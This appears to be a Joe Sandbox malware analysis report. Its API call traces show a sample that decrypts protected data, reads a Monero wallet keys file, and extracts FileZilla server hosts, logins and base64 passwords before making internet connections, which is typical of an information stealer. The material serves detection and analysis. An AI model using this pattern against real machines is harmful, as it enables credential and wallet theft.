                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 3855d6708debce910db32e151b32bab3a3251dd3835c0396269d76c686404a6a
                  • Instruction ID: be2ff06315c9e7bfa68a5e1ee6dfa7fd18b96d0264d56c6955574458cfbcb7fb
                  • Opcode Fuzzy Hash: 3855d6708debce910db32e151b32bab3a3251dd3835c0396269d76c686404a6a
                  • Instruction Fuzzy Hash: 2341F670A40A28AFEB24DB58CC84BDAB7B4BB49306F4041D9A608E72D0D771AEC5CF50
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C09B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C09BA3
                  • LocalFree.KERNEL32(?), ref: 00C09BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 069ff1d44656bf0fec4410c85a3a17e782a77c2897b1012886a7482c0c6912fe
                  • Instruction ID: c69c3f7f2792fef098d808fd6308a6a0c00c4a2d405c47d4cc1b64da6c3b3905
                  • Opcode Fuzzy Hash: 069ff1d44656bf0fec4410c85a3a17e782a77c2897b1012886a7482c0c6912fe
                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D989AAE77B5FF89300F104568E915A7390D770AE15CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ooU
                  • API String ID: 0-1500930429
                  • Opcode ID: e6625c2f48ba7e3dd3b27db319949d094cda9e9abc446ad30abd4955f53e830f
                  • Instruction ID: 41c26a6d2b21b64a1b4dd61499c1c3add279ab339929d78ab8248e330f71f118
                  • Opcode Fuzzy Hash: e6625c2f48ba7e3dd3b27db319949d094cda9e9abc446ad30abd4955f53e830f
                  • Instruction Fuzzy Hash: 2C5126F360C2005FE308AA2DDC5577ABBD9EFD4720F2A883DE6C5C3780E93598058656
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: J#8]
                  • API String ID: 0-3986886222
                  • Opcode ID: 373921d350dbbeb635000cbe5395428fab81c30f2e2b5dd03da77dd433ec01de
                  • Instruction ID: 9fd78c6e0f0c97c8533ca3d2de0a55bc5e7cbbf307c850ceee6364c189608c0a
                  • Opcode Fuzzy Hash: 373921d350dbbeb635000cbe5395428fab81c30f2e2b5dd03da77dd433ec01de
                  • Instruction Fuzzy Hash: 26416EF7E0551007E74C692CEC6577B7686DB90360F2F823DE98A97B84E83A1C0542C6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: E/}
                  • API String ID: 0-2449979294
                  • Opcode ID: cb0d4200fe1e1baf4188ad7f040cc55f8554b3c4ff741c1144de469a76b6e41b
                  • Instruction ID: 4e445193e0838b9eaec20f8143fff912809b05bd676ef4a4def427403b8d2724
                  • Opcode Fuzzy Hash: cb0d4200fe1e1baf4188ad7f040cc55f8554b3c4ff741c1144de469a76b6e41b
                  • Instruction Fuzzy Hash: 61415BB3A142148BE3147E7DEC5537AB7D8EB91720F1A063DDA84D3780E979490A8386
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 006388077f904e72344580a9639c1c3914e7743be5641352a59ee478a9f34908
                  • Instruction ID: dd78bedef777718d518f16f743c48c7bbd57343ae2713bd409a66cb2f4578dc1
                  • Opcode Fuzzy Hash: 006388077f904e72344580a9639c1c3914e7743be5641352a59ee478a9f34908
                  • Instruction Fuzzy Hash: 8152F6F3A0C2009FE714AE29DC8577ABBE5EF94720F1A893DEAC4C3744E63558058697
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8321d4e941bd7b0aec5f780958c613ff81fe18bc752ccf4e934a03451b9b6a99
                  • Instruction ID: 29f2115bb327274eea47b6487f1c3d3d23a08fb824ec1b094cdee3a25353e2da
                  • Opcode Fuzzy Hash: 8321d4e941bd7b0aec5f780958c613ff81fe18bc752ccf4e934a03451b9b6a99
                  • Instruction Fuzzy Hash: F05126B3A082149FF314AE28DC547BAB7D5EB98320F1A453DDAC9C7380EA3959418786
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bdc71bcd207b8d99b5b7d6e9b1262b4924a72bc0caae68c7399967379ee6fa6e
                  • Instruction ID: 858ee9cea0cb804f9f6213d71602179f20fd58e7b9bf22cfbbfbc63a94f8e63e
                  • Opcode Fuzzy Hash: bdc71bcd207b8d99b5b7d6e9b1262b4924a72bc0caae68c7399967379ee6fa6e
                  • Instruction Fuzzy Hash: 98418AF3F192144BF3045A3EDC84767B6879BE4720F3B863DCA8857788EC39580A4296
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aa43ab1c5a1046c35910f6eb28ddf742e73f0a5859461489a4db5cb8767e08f0
                  • Instruction ID: a2886a4dab9a6292d5d233dbb98dc45e81e18e2dfcecb37a6abf5d59346c40a2
                  • Opcode Fuzzy Hash: aa43ab1c5a1046c35910f6eb28ddf742e73f0a5859461489a4db5cb8767e08f0
                  • Instruction Fuzzy Hash: AA416AF3D1811457F3086A28DC5577AB69ADBA4320F1B463CEF8A973C4E87A5C1582C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 28ec6dca26a2e9f6b6ed26faf0de258eed0dd81f811d444878b793477dab5f9b
                  • Instruction ID: 492ec6b87d79e39dbfa19cdd7681671d331786affa536c984ae5e8077d571d64
                  • Opcode Fuzzy Hash: 28ec6dca26a2e9f6b6ed26faf0de258eed0dd81f811d444878b793477dab5f9b
                  • Instruction Fuzzy Hash: EA41B2B254C3089FE344BE69EC8667AF7E5EBA4310F56493DCAC583700EA756844C647
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00C20DBA,00C20DB7,00C20DB6,00C20DB3), ref: 00C10362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C10369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C10385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C103CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C103DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00C10419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C10463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C1051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C10532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C1054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C10562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00C10571
                  • lstrcat.KERNEL32(?,url: ), ref: 00C10580
                  • lstrcat.KERNEL32(?,00000000), ref: 00C10593
                  • lstrcat.KERNEL32(?,00C21678), ref: 00C105A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00C105B5
                  • lstrcat.KERNEL32(?,00C2167C), ref: 00C105C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00C105D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00C105E6
                  • lstrcat.KERNEL32(?,00C21688), ref: 00C105F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00C10604
                  • lstrcat.KERNEL32(?,00000000), ref: 00C10617
                  • lstrcat.KERNEL32(?,00C21698), ref: 00C10626
                  • lstrcat.KERNEL32(?,00C2169C), ref: 00C10635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C20DB2), ref: 00C1068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 9265794533206efb50e65c9be5619be9d5affe6989653f455ee5995ab6565a9d
                  • Instruction ID: 2d534f75e17f27ba0bc90cc1cc2de92065c7c6dcea757e33ad68546a27f059ef
                  • Opcode Fuzzy Hash: 9265794533206efb50e65c9be5619be9d5affe6989653f455ee5995ab6565a9d
                  • Instruction Fuzzy Hash: 44D152759412089FDB04EBF0DD8AEEE7338EF19310F544429F502B6191DF74AA8AEB61
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C059F8
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C05A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C05B93
